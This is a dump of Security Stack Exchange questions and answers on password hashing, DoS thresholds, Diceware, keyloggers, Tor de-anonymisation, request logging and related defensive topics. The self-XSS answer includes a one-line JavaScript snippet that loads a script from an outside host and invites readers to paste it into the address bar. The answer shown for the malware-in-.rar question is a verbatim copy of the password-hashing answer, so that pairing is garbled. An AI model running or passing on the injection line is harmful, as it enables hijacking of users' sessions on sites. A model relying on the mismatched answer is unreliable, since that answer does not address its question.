118,114 | I'm currently an engineer on a project in development phase. One 'module' on this project gives the ability for user authentication/authorization. However it's come to our concern that the password hashing algorithm may not be up to cop (aka not BCrypt). (The terrible thing is not quite sure what it is and where it came from!). This obviously has to change and the patch is being scheduled. We have to naturally update all our test users because their passwords will be using the old hashing method, not much of a problem, all our demo users are automated on build so it's updating the script. But the next question is what if this is a production system with active and stale users, of all amounts. What would be best practice. Automatically force a password reset on every user? This will notify every user that their password has been changed and may cause question/confusion and may cause suspicion that there's been a security breach. More questions may be asked which may not necessarily be able to be answered by website stakeholders. Update the DB to flag whether it's the new or old method, then once a user has been authenticated update their password in the DB using. Requires a bit of logic in the service and transition will be seemless to any existing user. The problem being if there was a breach then it may be evident that there are two methods going on here and if the less secure one is found to be that insecure it could obviously be broken. Reset all passwords, using a BCrypted version of the existing hash. Flag it as the old style, so on successful authentication it just keeps a hash of the password rather than a hash of a hash. | Your option 1. is a bad idea: in addition to the User-Experience / Public-Relations reasons you state, you're also giving attackers a window to intercept the password reset tokens and compromise every account on your server. It also doesn't solve your problem if you have even one user who's too lazy to log in / update their password. At first glance, both 2. and 3. seem fine to me. Your #2 is no less secure than what you're doing now, but 2. would mean you have to continue supporting the current weak login forever (or do something like "After X months we're wiping your password and forcing you to do a recovery" which breaks the nice user-transparency you want, so let's ignore that). Let's consider the case where you have users in the DB who will never log in again. With both 2. and 3. you have to continue to support the current hashing alg in your code-base forever just in case they do log in, but at least 3. has the advantage that they (or rather, you) are protected against offline brute-force attacks if your DB is ever stolen. Since you'll have to keep the "old style flag" column around forever, do yourself a favour and make it an int not a bool so that if you ever have to update your password hashing alg again, you can record which old style they are on. UPDATE: A very similar question was asked here and built on the discussion from this thread. | {
"source": [
"https://security.stackexchange.com/questions/118114",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/99675/"
]
} |
118,119 | Let's say I have one server called A which host an upload website which is connected at the network connection B. Let's say one of my clients uploads multiple .rar files of 1 MB (that contains malware parts) and when I unzip them I rebuild the malware. Is there a way to detect that malware parts before I unzip the files? Can I have a firewall/device that will check all the files between A and B and block them? Is this technically possible? | Your option 1. is a bad idea: in addition to the User-Experience / Public-Relations reasons you state, you're also giving attackers a window to intercept the password reset tokens and compromise every account on your server. It also doesn't solve your problem if you have even one user who's too lazy to log in / update their password. At first glance, both 2. and 3. seem fine to me. Your #2 is no less secure than what you're doing now, but 2. would mean you have to continue supporting the current weak login forever (or do something like "After X months we're wiping your password and forcing you to do a recovery" which breaks the nice user-transparency you want, so let's ignore that). Let's consider the case where you have users in the DB who will never log in again. With both 2. and 3. you have to continue to support the current hashing alg in your code-base forever just in case they do log in, but at least 3. has the advantage that they (or rather, you) are protected against offline brute-force attacks if your DB is ever stolen. Since you'll have to keep the "old style flag" column around forever, do yourself a favour and make it an int not a bool so that if you ever have to update your password hashing alg again, you can record which old style they are on. UPDATE: A very similar question was asked here and built on the discussion from this thread. | {
"source": [
"https://security.stackexchange.com/questions/118119",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/98652/"
]
} |
118,147 | I have read that GPUs can be used in brute force attacks? But how can this be done and is there a need for any other hardware devices (hard disks for instance)? Note: I'm more interested in web application security, but I don't want to put on blinders. I'm sorry if my question is ridiculous for you, but my hardware background isn't very good. I just know how basic components work together and how to combine them. | I'm choosing to assume you're asking why it's a risk rather than how to hack. GPUs are very good at parallelising mathematical operations, which is the basis of both computer graphics and cryptography. Typically, the GPU is programmed using either CUDA or OpenCL . The reason they're good for brute-force attacks is that they're orders of magnitude faster than a CPU for certain operations - they aren't intrinisically smarter. The same operations can be done on a CPU, they just take longer. | {
"source": [
"https://security.stackexchange.com/questions/118147",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/94890/"
]
} |
118,241 | I have read on the net that authorities are having troubles monitoring Playstation 4 communications. As usual the news are very non technical. What makes the Playstation 4 network harder to intercept? | Many of the news were just sensational news, not actual. There have been reports surfacing after this that security agencies monitor xbox and playstation communications. It came up as a playstation was found in one of the Paris attackers flats. It was baseless and been debunked quickly ( https://motherboard.vice.com/read/how-the-baseless-terrorists-communicating-over-playstation-4-rumor-got-started ) however that didn't stop the hoax. The communications also don't use crypto as opposed to many better communication techniques for secret communications. So the answer is, its quite easy to intercept and Sony probably helps law-enforcement do it already. Some reports even say they are also using algorithms to search for suspicious activity themselves. | {
"source": [
"https://security.stackexchange.com/questions/118241",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/104030/"
]
} |
118,344 | Recently I used a tool to download a website and as part of the tool one could adjust the number of parallel connections. So now I found myself asking: starting from how many requests a provider could rate it as a denial of service. I googled around however didn't find specific numbers or at least hints about what dimensions we are talking about. Is there any definition e.g. like 100 requests a second? So my question is: How many requests are needed to state that a denial of service is in progress? Update: the technical background is definitely of interest. I understand that one malicious packet could be enough to cause a denial of service or the slashdot effect is another. But what I wanted to know was more of a firewall style rule: Some servers / service providers block out users which send too many requests in a certain time frame. About what dimension are we talking about here? Or is that too specific? If so what would your rule look like? The question also had a legal component - let me illustrate a high(!) theoretical scenario: A provider of a service checks its logs and sees that there has been high traffic from a single IP. Now the provider goes to court (for whatever reason) and labels this as an attempted denial of service. The judge would probably ask for their definition of a DoS. "Anything beyond the normal usage" would be their answer. So where is the threshold between normal usage and "none" normal usage (which could be interpreted as an attempted DoS even if the server remains totally unimpressed and this is probably a highly constructed scenario ;-) | Enough to cause the service to be denied to someone. Might be 1 unexpected malicious request, which causes excessive load on the server. Might be several million expected requests, from a TV advert with a really good response. There isn't a specific value, since all servers will fail at different levels - serving static content is a lot easier on the server than generating highly customised content for each user, so generally authenticated services will have a lower "problem" threshold than unauthenticated ones. Servers sending the same file to multiple users may be able to handle more traffic than servers sending distinct files to multiple users, since they can hold the file in memory. A server with a fast connection to the internet will usually be able to handle more traffic than one with a slow connection, but the distinction might be less dependent on that if the generated traffic is CPU bound. I've seen systems that fail at 3 requests per second. I've also seen systems which handle everything up to 30,000 requests per second without breaking a sweat. What would be a DoS to the first, would be a low traffic period to the second... Updated to respond to update How do firewall providers determine when traffic is causing a denial of service? Usually, they watch for response times from the server, and throttle traffic if they go above a pre-set limit (this can be decided on a technical basis, or on a marketing basis - waiting x seconds causes people to leave), or if the server responses change from successful (200) to server failure (50x). What is a legal definition of "denial of service"? Same as the original one I gave - it's not denial of service if service has not been denied. It might be abusive, but that wouldn't be quite the same thing. | {
"source": [
"https://security.stackexchange.com/questions/118344",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/105378/"
]
} |
118,411 | Is having a longer/more complex username considered more secure than using a shorter/basic one? Would the uniqueness of a username positively impact security? This is assuming that adversaries aren't aware of what the username may be, eg. a remote terminal login. | A harder to guess username adds to the security if it's kept secret. The problems are Usernames are often not kept especially secret. On most systems allowing multiple users to log in, any user can view the list of valid users. On systems that run mailservers, the mailserver can effectively be used to check if a username might be valid as most mailservers will accept mail for any local user. Various programs may include your username by default in outgoing traffic when they connect to servers. New user signup forms or password recovery forms may allow an attacker to check if a username is taken. Usernames are often harder to change than passwords. So when adding additional complexity to your login credentials, it's best to get into the habit of putting that extra complexity in the password rather than the username. | {
"source": [
"https://security.stackexchange.com/questions/118411",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2916/"
]
} |
118,445 | A firm has 10 million files, all ransomware encrypted, but the firm has all of those 10 million files backed up, and almost all of them have not changed. Would comparing all of those files against their unencrypted backups in addition to the other cracking algorithms help discover the key? | What you are suggesting is a Known Plaintext Attack, and yes if the encryption algorithm is bad enough, it could be used to discover the key or keys used to encrypt the data, depending on the cipher used. I say keys because some ransomware uses individual keys per file, so cracking one key would only give you the key to that file. Practically this is unlikely to be useful as unless the ransomware encryption scheme has some sort of flaw (weak cipher, poor pseudo-random data source, small key, etc) or you have access to massive decryption computing resources then your great-grandchildren might just live to see one of the files cracked. | {
"source": [
"https://security.stackexchange.com/questions/118445",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/105489/"
]
} |
118,450 | I always hear "A long password is good, a longer password is better". But is there such a thing as a " Password is so long it is becoming unsafe " or " Password is long enough, making it longer won't matter "? I am interested in the security of the password regarding cracking it only. Not if it can cause a DoS overload the servers while hashing, or if the vendor thinks otherwise . Also assume the password does not contain any dictionary it'd be in comments anyway. words, is stored using best practices , has a strong and unique salt , and relevant entropy per character. How the user will remember / recall / store the password also doesn't matter. I agree that longer / passwords / are safer . I'm asking about the upper limit. Is there a length (or entropy size) where making the password longer no longer (sic) matter, or even weakens its security? I know it depends on the hashing algorithm, if the upper limit for a given algorithm exists and is known, what is it? | 128 bits (of entropy) The main purpose of a longer password is to prevent brute force attacks. It is generally accepted that 128 bits is beyond anyone's capability to brute force, and will remain so for the foreseeable future. You see this figure in a few places, e.g. SSL ciphers with 128-bit or greater key length are considered "high security" and OWASP recommends that session tokens be at least 128-bit. The reasoning is the same for all these - 128 bits prevents brute force attacks. In practice, if a password is made of upper and lower-case letters, numbers, and a little punctuation, there is approximately 6 bits of entropy in each character, so a 128-bit password consists of 22 characters. A password can be compromised in ways other than brute force. Perhaps there is a keylogger on the client system, or the user gets phished. Password length makes almost no difference to these attacks - even a 1000-bit password would be captured just the same. And these attacks are common in practice, so it really isn't worth using passwords that are too long. In fact, you can get away with a bit less than 128 bits. If the password is hashed with a slow hash function like bcrypt, that makes a brute force attack harder, so 100-bits (or thereabouts) completely prevents brute force attacks. If you're only concerned with online attacks, and the site has a lockout policy, then you can get away with less still - 64-bits would completely prevent a rate limited online brute force attack. | {
"source": [
"https://security.stackexchange.com/questions/118450",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/44336/"
]
} |
118,568 | I'm developing a web service that stores sensitive personal information (such as telephone numbers, addresses, full names, and email addresses) in a database, such that it can be accessed from anywhere with an Internet connection. As part of this, it's obviously a good idea to be encrypting that data to add security against being hacked. It has to be encryption rather than hashing because the data has to be accessed again. I would also like to do this encryption such that each user has their own decryption key. This means that even administration can't access the data, which also protects against internal corruption. Given that I've already got user accounts, is it acceptable to use the user's password as the encryption key? That leaves me with a process like this: User signs up. Hash their password, as normal. User creates some entries and saves them. User signs out. Ask for their password, check it against the stored hash to verify it, then use it to encrypt everything they have in the database. User signs in. Verify their password, then use it to decrypt everything they have. Obviously this isn't the best possible security - but are there any major flaws with this method? | If you do the encryption and decryption on the server-side, there is always a chance for an administrator to decrypt the data without the knowledge of the user, by modifying the system so that when a user legitimately decrypts his or her data, the decryption key is stored to be used at the leisure of other interested parties, for instance, in the service of warrants. That said, the scheme you describe is generally along the lines of how systems like this are in fact built, and in normal use, are reasonably secure. There are a couple of caveats, or clarifications, however. You would not use the password directly as a key. You would use a PBKDF such as bcrypt, scrypt, or PBKDF2 to turn the password into a strong random key using as high a work factor as makes sense for your application. You would generally not use this key to encrypt the data directly. You would generate a strong random key on the server that will be the actual data encryption key (DEK). The key derived from the password will then be used as a key-encryption-key (KEK) to encrypt the DEK. This way, if a user decides to change their password, you generate a new KEK, and you only have to re-encrypt the DEK, and not all of the data. With this system, you're not actually required to store a password hash at all. When a user logs in, you merely need to derive the KEK, decrypt the DEK, and determine if it can correctly decrypt data for the user. If it can, the password is correct. If not, it isn't, and you can fail the authentication attempt. This may or may not be desirable depending on the application. | {
"source": [
"https://security.stackexchange.com/questions/118568",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/47013/"
]
} |
118,643 | Diceware passphrase lengths are on the rise - up to six or seven words now. The old adage that passphrases are easier to remember may be true for shorter phrases, but six truly random words can be tough to remember. On the other hand, full sentences may be easier for some to remember. Take for example the Diceware-generated passphrase tracy optic renown acetic sonic kudo . We could turn that into a (nonsensical) sentence such as Tracy's optics were renowned, but her acetic sonic cost her kudos. The Diceware passphrase has an entropy of 77.4 if the attacker knows you're using six Diceware words ( 12.9 per word ), and 107.219 (according to this calculator ) if they don't. The sentence form has an entropy (according to the calculator) of 255.546. However, it's not fully random any more, which is supposed to be one of the big benefits of the Diceware approach. Assuming that the attacker somehow knows that you're using this method of passphrase generation, does the sentence form decrease the security of the passphrase in any way? For example, perhaps they can use some kind of analysis of English sentence structure to narrow down their required guesses? Assuming the answer to the above is "No, sentence form does not decrease security," then here's another consideration: One benefit of the sentence format is that it's very long and includes non-alphabetical characters (eg. the apostrophe and comma). However, that's a definite downside when trying to type it on a mobile device. Say we shorten the Diceware phrase to three words - tracy optic renown - and then turn that into an [a-z] sentence - tracy is optically renowned or perhaps tracy is optically renowned worldwide (to further distinguish it from the Diceware wordlist). If we were to use three Diceware words and the attacker knows we're using Diceware then we have an entropy of 38.7. However, tracy is optically renowned worldwide is 100.504 bits of entropy according to the calculator. Given the differences between the three word Diceware phrase and the short sentence form, which entropy calculation is more accurate - the Diceware calculation (ie. the differences are too slight to matter) or the calculator's calculation (dictionary/brute-force/etc.)? Note: assume that any length or combination of characters is acceptable for the password | It does not decrease the security. What is actually happening is that your "entropy calculator" is giving you a false measure of entropy. It can only give an approximate estimate, after all. There's actually interesting proofs that show that one can never actually know the amount of entropy in a particular string of text unless you know something about how it was constructed. A pass string 1000 words long created by a "physical random number generator" like a resistor noise network will appear to have the same amount of entropy as a pass string 1000 words long generated using a Mersene Twister, until you realize that the Mersene twister actually leaks all of its seed information in any contiguous block of 624 values. Entropy calculators can only make heuristic assumptions about how random the data actually is. This, of course, is why we have Diceware. It can prove [an underestimate on] entropy because randomness is built into the process. To prove the security of a pass-sentence like you are looking at, consider an oracle test. I select a bunch of words using Diceware, and then I build a sentence out of them. I then provide you with an oracle which constructs sentences out of them. It is guaranteed that, if you provide the oracle with the correct set of selected words from Diceware, it will provide exactly the sentence I used. For all other sets of words, it will produce an arbitrary sentence using them. It is trivial to see that the entropy of my password cannot possibly be lower than the entropy built into the Diceware words I selected. Even with this immensely powerful oracle to reduce the very human process of sentence formation to nothingness, the randomness from diceware will remain. You cannot guess my password any faster than you could guess the original set of Diceware words I selected. Now there are a few caveats. If you use fewer diceware words, like your later example, you get fewer bits of entropy from the diceware layer. This means that oracle I mentioned above becomes more and more helpful for breaking the sentence based password. Also, some of the sets of words you get from diceware can be particularly difficult to turn into sentences. If you ever reject a set of diceware words as part of your pass-sentence building process, you are calling into question the perfect randomness that diceware relies on. Now, why the oracle attack? Oracles are very powerful tools for testing cryptographic theory. In reality, tracy is optically renowned worldwide is actually probably quite a lot stronger than the 38.7 bits from the diceware words tracy optic renown . Breaking that sentence will take more work than the words, though probably not the full 100.504 bits the entropy calculator heuristically estimates. So how much stronger? We don't know. That's the point of oracle attacks. In an oracle attack we say "let's just assume this hard to calculate part of the process offers zero increased security. None at all. Is the process still secure?" If it is secure under this extreme assumption, then it is clearly secure against real life attacks where the attacker doesn't necessarily have such a magically powerful oracle at their disposal. | {
"source": [
"https://security.stackexchange.com/questions/118643",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/104969/"
]
} |
118,709 | I used a dongle before getting a phone, but now use my phone as a hotspot. I don't want my phone to get malware or viruses. Can my phone get viruses if I use it as a hotspot while downloading torrents? | By just passing (potentially malicious) traffic through, it is very unlikely. After all, routers on the Internet are relaying tons of malicious traffic everyday without getting compromised themselves. However the danger begins when your computer itself gets compromised from a malicious file downloaded via torrents, and from there the malware on your computer could compromise other hosts on your network such as your phone. | {
"source": [
"https://security.stackexchange.com/questions/118709",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/105748/"
]
} |
118,804 | Recently it seems there has been a big outbreak of zip files being emailed to people with a .js file containing code that downloads and executes cryptoware. How does the .js actually get executed though? Do users have to execute the javascript file itself after extracting it or is it somehow possible to make the javascript file execute upon extraction? I am rather confused on how this causes so many infections. | Do you remember "I love you" ? Human curiosity often does the trick, unarchiving the zip and then executing the JS (via the windows scripting host that does not follow the same restrictions as a browsers JS engine) There are more than enough people that do want to be sure they didn't miss a payment and will be cut off their mobile phone soon. A fundamental unawareness of how email works is another great factor here: The email comes from Tom! And he says I should have a look. Tom always shares funny images on facebook, let's see! Completely unaware of email-sender spoofing (which shouldn't be a problem with DKIM, SPF, S/MIME and PGP around, but that's another story), those users just trust the sender and open the files. INORITE? But that's just human curiosity bundled with fatal lack of knowledge. | {
"source": [
"https://security.stackexchange.com/questions/118804",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8614/"
]
} |
118,847 | Given the fact that modern browsers these days prohibit JavaScript from having access to any resources on the client's machine, does JavaScript execution from the address bar pose any threat at all to the client's machine (the machine the browser is running on)? | That JavaScript executed from the address bar will run in the context of the website displayed in that tab. This means complete access to that website and it could change how the website looks and behaves from the point of view of the user. This attack is called self XSS and can cause harm to the user and indirectly to the machine. A reputable website can ask the user to download and install a malicious piece of executable code by pretending, for example, that it needs a Flash update. To get a nice visual example of this, manually type javascript: in your address bar and then paste this: z=document.createElement("script");z.src="https://peniscorp.com/topkek.js"; document.body.appendChild(z); If you don't trust me, do it in the address bar of a website you are not logged in. Most browsers have realised this vulnerability and attempt to limit the impact by cutting out javascript: when pasting javascript:some_js_code in the address bar. But it is still possible to manually write it and execute it. | {
"source": [
"https://security.stackexchange.com/questions/118847",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27398/"
]
} |
118,853 | I had a landline phone call about xyz with an xyz -expert (also on landline) for about an hour, for the first time. After couple of days I started getting suggested links on websites as an ad exactly about xyz 's services. Question: In theory, either my landline phone company or my smartphone is listening in, then probably selling my info. Is this type of ad profiling common and/or legal? Or was it pure chance I saw the targeted ad? Update from comments: I am based in the UK I never did a web search on the xyz topic, nor sent/received emails regarding this topic. That is why I am assuming phone calls are being profiled. As pointed out, the legality side belongs to a different SE, so just in case if anyone can provide legal side of the question, it would be a huge bonus. Updated question: I am also curious if these types of practices exist at all: A Landline company keeping track of certain word frequencies Or my smartphone doing something similar, even when it is not in use | Data dealers often buy data from multiple sources and aggregate it to generate an all-compassing user-profile from it. For example: xyz company sold your telephone number and what the conversation was about. social network which asks for your phone number for password recovery sold your telephone number and your ip address at some point in time. advertisement network sold the tracking cookie ID for that IP address at that point in time. Now the data dealer has linked your call with xyz to your identity on the advertisement network and can pay the advertisement network to show you xyz-related advertisement. To avoid this from happening in the future: Look at the privacy policy of any companies and websites you interact with and refuse to do business with them when the policy allows them to resell your data. Do not reveal more personal information to internet services than strictly necessary. Use a browser plugin like Ghostery or Privacy Badger to block web trackers (keep in mind that an advertisement filters like AdBlock only blocks visible advertisement and are not designed to prevent invisible trackers from tracking you). Inform yourself about what rights to privacy you have according to your local laws and make use of them (for example, in many EU countries you have the right to order companies to tell you what private information they have about you and can order them to delete it). | {
"source": [
"https://security.stackexchange.com/questions/118853",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/35444/"
]
} |
118,975 | Lately I've seen plenty of APIs designed like this: curl "https://api.somewebsite.com/v1/something&key=YOUR-API-KEY" Isn't it elementary that passing an API key in a query string as a part of the URL is not secure at least in HTTP. | This is commonly known as a capability URL / secret URL. It's secure in modern websites but not suitable for all applications and requires significant care to use . You can find an excellent overview of their advantages, risks and best practices in this page by W3C . It's meaningless to talk about security without specifying a threat model. Here are a couple that come to mind: 1: A passive attacker on the network (eavesdroping) 2: An active attacker on the network (can change packets at will, mitm, etc) 3: A shoulder-surfer 4: An attacker with physical access to your computer / elevated privileges 5: another user of your computer (regular privileges / remote access) 6: the user itself (as in protecting a API key) Regarding network attacks (1 and 2), capability URLs are perfectly secure , provided you're using HTTPS (it's 2016, you shouldn't be using HTTP anymore!). While the hostname of a server is sent in plaintext over the network, the actual URL is encrypted before being sent to the server - as it's part of the GET request, which only occurs after the TLS handshake. Regarding shoulder-surfing (3), a capability URL with enough entropy is secure against a casual attack, but not against a dedicated attacker · As an example, a google docs URL: https://docs.google.com/document/d/5BPuCpxGkVOxkjTG0QrS-JoaImEE-kNAi0Ma9DP1gy Good luck remembering that while passing by a co-worker's screen! Obviously, if your attacker has a camera and can take a picture without being noticed, it's an entirely different matter .
If the information you're securing can put your users at risk of this kind of attack, you should probably not use a capability URL. Or at least mitigate the issue by doing a HTTP redirect away from the capability URL, so it's only on screen for a few seconds, Regarding an attacker with elevated privileges on your computer (4), a capability URL is not less secure than a long password or even a client-side TLS certificate - as all of those are actually completely insecure, and there's not much you can do about that. An attacker with regular privileges (5), on the other hand, should not be able to learn the capability URL as well, as long as you follow good security practices for your OS . Your files (particularly browser history) should not be readable by other users. If you share your computer account with other people, this is also horribly insecure. A good rule of thumb for shared computers is to not use them to access any information you'd not speak out loud in the street. For protecting API keys (6, which was the point of this question), a capability URL is also as secure as a less visible mechanism (such as an AJAX POST) . Anyone that has an use for an API key will know how to use the browser debug mode to get the key. It's not reasonable to send someone a secret and expect them not to look at it! Some people have asked about the risks on the server side. It's not useful to treat server-side risks by threat modelling in this scenario. From a user perspective, you really have to treat the server as a trusted third party , as if your adversary has internal network access on the server side, there's really nothing you can do (very much like a privileged attacker on the client's computer, i.e. threat model 4 above). Instead of modelling attacks, I'll outline common risks of unintentional secret exposure . The most common concern with using capability URLs on the server side is that both HTTP server and reverse proxies keep logs, and the URL is very often included . Another possibility is that the capability URLs could be generated in a predictable way - either because of a flawed implementation, a insecure PRNG , or giving insufficient entropy when seeding it . There are also many caveats that have to be taken into consideration when designing a site that uses capability URLs. In practice, for sites with dynamic content, it's quite hard to get everything done securely - both Google and Dropbox botched it in the past, as mentioned on this answer Finally, capability URLs have a couple of advantages over other authentication methods : They are extremely easy to use (just click the link, as opposed to entering your email and password) They don't require the server / service to securely store sensitive user credentials They are easily shareable without risks, unlike sharing you password (which you reuse for 50 other sites). | {
"source": [
"https://security.stackexchange.com/questions/118975",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/32926/"
]
} |
118,988 | I'm trying to improve security in a web application. The application has an admin site and keyloggers are a concern that I'm trying to solve. Can the application do something that can prevent keyloggers from working correctly? I've read about Keystroke interference software (for each user keystroke they randomly add more keystrokes not interfering with user input), can something like that be done in javascript? | Many applications make futile attempt to foil keyloggers and spyware by using convoluted (and cumbersome) password entry methods. None work against keyloggers and many actually cause users to be LESS secure because they make it hard to use password managers. The best way to handle that kind of things is to use one-time passwords. There are several ways to go about it so let me suggest two: TOTP ( RFC 6238 ) works with many software authenticators (Google authenticator, for instance) so it's both convenient, cheap to implement and free to use. It does require the user to set things up and have a smartphone, though. Another approach it to send a one time password through SMS. This is a bit more expensive (because you have to send the message) but it's also easier for the user (who only needs a mobile phone and no setup). | {
"source": [
"https://security.stackexchange.com/questions/118988",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/106029/"
]
} |
119,004 | I'm currently looking at Secure Coding Practices documentation provided by Veracode with their code analysis toolsuite. In a "secure logging practices" section, they mention that logging full HTTP requests in case of error is a common mistake, but they don't explain why. I'm working on a personal website where I have 2 separate log files : errors.log : any unexpected exception ends up being caught and logged in that file. There, I simply log the stacktrace (classic simple basic exception logging) security.log : any request that could not be made via the UI, which is a sign of a forged request (example : IDOR attempts like someone trying to access data from another user), leads to a custom runtime security exception being thrown.
That Security Exception notably stores the http request that was made, and is then logged.
Basically, all my backend validators (that make the same checks as the front-end validators) throw this Security Exception when something goes wrong - the idea is that I (or a Cronned task ;) ) can regularly verify that security.log is empty. I decided to log the full http request (by that I mean : not the raw request, but I extract all the headers / cookies and parameters and display them in a readable manner, as well as info like timestamp, origin IP and such things) for the security exceptions only (to facilitate the analysis of potential biz-logic-related attacks). That log file will be opened in a text editor only (VI most probably), and will not be automatically parsed by tools or displayed in a webapp. Now, I understand that logging full http requests can be leveraged under some conditions. A classic example is a log-analysis webapp prone to XSS attacks that is used by a helpdesk - in this case an attacker could forge a malicious request to let the payload explode once the helpdesk guys check the content of the logs via the vulnerable webapp. I also understand that logging too much stuff can lead to Denial Of Service due to disks becoming full, but this is already the case with stacktraces. In my case, what dangers could arise from logging requests, in particular cases ?
The only (technically valid but unrealistic, given the low sensitivity of the website) thing I see would be a specially crafted payload that could cause some sort of buffer overflow when parsed by VI (the attacker would have to know that I use VI + use a 0-day etc.. Ok possible for NSA but unrealistic for this small site which is not a target of interest besides for some script kiddies). I guess someone could do some log forging but good luck finding out my unique request display :P Since I extract data in the request and display them in my own way, it's practically impossible to fool me via log forging. Should I specifically check for end-of-file VI control characters (does that even exist ?) ? What else could go wrong ? Am I missing something here ? Now I realize that my question could be paraphrased : "what can go wrong if I let users write text (via the request content..) to a single controlled file on my machine that will only be opened by a up-to-date well-proven text editor" UPDATE Update to provide more info in regards to the 3 first feedbacks (thanks for that great feedback btw !) The login form is not covered by the mechanism (but the registration form is !) I don't run a shop, there are no highly sensitive info. The most sensitive infos would be the first/lastname and birthdate during user registration. There is a game with points and rankings, so security is important to prevent cheating (therefore this custom logging) Insisting on the fact that only malicious-looking (front-end-validation bypassing) requests will be logged, in an utopian world the secure-log-file would stay empty forever Thanks to your feedback I realize the following, amongst other things : Disclosure of the content of this file could allow session hijacking due to session cookies being extracted from the request A bug in the request parser could make a request not get logged A bug in my code could log a malformed user-registration request which would store sensitive info in the secu-log (password clearly being the most sensitive) Handling : Regarding disclosure of the content of the file, I assume that if someone gets there, I'm pwned already :) Regarding the bug in the parser, indeed, but at least it would trigger an exception which would be logged in the "normal" logger, this is acceptable Regarding the registration form, I consider that even if such a rare bug would occur I should not have access to a plaintext password, even by accident. I'll adapt the parser not to store any request parameter that matches a *password* pattern. I guess that I can't realistically go further than that to protect my users (if I want to be able to detect biz-logic attacks live). I suppose that 99% of sites on the web don't go half as far as those considerations :) ). It seems clear to me that the small added attack surface is outweighed by the security benefits that this custom logging provides. I'll add additional thorough unit tests to that part of the codebase to ultimately reduce the risks of a bug. In a corporate environment I would guess twice regarding the logging of sensitive data - I guess I would discuss the matter with someone like a Data Compliance Officer | The key word is properly . Properly logging HTTP requests when there is a need for it is not bad practice. I am a pen tester and I log all the HTTP requests that I make as part of a test; doing so is expected. I also work on a server system that integrates with a number of complex legacy systems. Logging full HTTP requests on error is a necessary feature. It can show details like which system in a cluster made the erroneous request, which would otherwise be lost. Veracode is an automated source code analysis system. It can tell if you're passing a HTTP request to a log function. But it cannot really tell if you are logging "properly". So they have come up with this rather vague finding, because that's the best their system can do. Don't put too much weight on it. Does the issue have a risk rating? I suspect it would be low risk. Most people are less thorough than yourself and pay little attention to low risk issues. They key parts to logging properly are: Log injection / forging Denial of service Confidentiality of logs You mention the first two in your question. For a personal website, the third one is a non-issue - you're the owner, sys-admin, everything - and only you will have access. This is a much bigger issue in a corporate environment, where you certainly don't want to let everyone in the company have access to the confidential data (like user passwords) in the requests. Some systems deliberately mask parts of data in logs - especially credit card numbers, for PCI compliance. You mention you extract headers, cookies and parameters and format them in the log file. I recommend you log the raw requests, and have a separate post-processor to format them. There will be odd situations - e.g. parameter duplicated in URL and POST body - that may cause errors. Extracting and formatting can cause the feature in the original request to be lost. | {
"source": [
"https://security.stackexchange.com/questions/119004",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/68225/"
]
} |
119,146 | I read in this article that the FBI was able to crack the anonymity of Tor. From what I heard and read, onion routing makes it almost impossible to de-anonymize a user. The last time I heard anyone trying to crack Tor was the NSA and it did not succeed or at least they did not publicly advertise it (The article was 2 to 3 years old now and may not be that relevant anymore). Do anyone have any insights on how the FBI might have done it? | The article you link says that the FBI obtained "the MAC address" for the user computers. MAC addresses are specific to each ethernet hardware, and they don't travel beyond the first hop -- meaning that they are visible to your home router, possibly the one provided by the ISP, but not beyond. If that specific piece of information is true, then this means that the FBI really deployed a piece of malware on the site, and the users simply got it on their computer. After all, the FBI first seized the offending site and ran it, at which point they had full control over its contents. People using Tor to access a child pornography site are not necessarily smarter than average people, and they would intrinsically "trust" that site, making malware deployment possible, even easy. Tor anonymity relies on the idea that potential attackers (the FBI in that case) cannot control sufficiently many nodes to make correlations possible. However, that "sufficiently many" is not that big a number; if one of your connections, even temporarily, goes through an "entry node" controlled by the attacker, and the same attacker can see what happens on the exit (and he can, if he actually hosts the target site), then correlation is relatively easy (through both timing of requests and size of packets, because encryption does not hide size). With control of the target site, it would be even possible to change the size of individual response packets to help correlation. However, Tor does nothing against hostile code sent to the user and executed by the user, and if the MAC address was recovered then such code was involved. | {
"source": [
"https://security.stackexchange.com/questions/119146",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/94175/"
]
} |
119,343 | I own a chat room and some users use a program Winsock Packet Editor, "WPE PRO". With it they manage to bypass chat rules, like they can't be muted or kicked, and they can send messages fast bypassing the limit of the chat. I was wondering if there is a way to end this? About the software from the developer website: Winsock Packet Editor (WPE) Pro is a packet sniffing/editing tool which is generally used to hack multiplayer games. WPE Pro allows modification of data at TCP level. Using WPE Pro one can select a running process from the memory and modify the data sent by it before it reaches the destination. It can record packets from specific processes, then analyze the information. You can setup filters to modify the packets or even send them when you want in different intervals. WPE Pro could also be a useful tool for testing thick client applications or web applications which use applets to establish socket connections on non http ports. Update : Its called 123flashchat, its Java/Flash, unfortunately the company abandoned the project, no updates or fixes any more. and the issue is not kicking the user, there is a ban on the ip, but a user can change the ip and return and start spamming messages fast | If what you describe is true, your chat room is designed badly. The view of the server and what packets it receives should be forwarded to other users should be independent from whatever packets are coming in or going out. Manipulating the traffic on a client should only interfere with that client's view of the chat room, never with other clients. If you designed that differently, you are trusting on the clients to behave correctly. You should never do that. Misbehaving clients (those not behaving according to your rules) may create even bigger problems for you than people not being kicked. Here are a few examples of things that may happen without proper input validation: Users may impersonate other users, leading to massive trust and confidentiality breaches Users may gain rights they otherwise wouldn't have, being able to hold your service for ransom Side note here: There are many web clients for IRC that are easy to deploy and many IRC networks that let you host channels for free. Have your pick and rely on a thorough platform for chats. | {
"source": [
"https://security.stackexchange.com/questions/119343",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/106347/"
]
} |
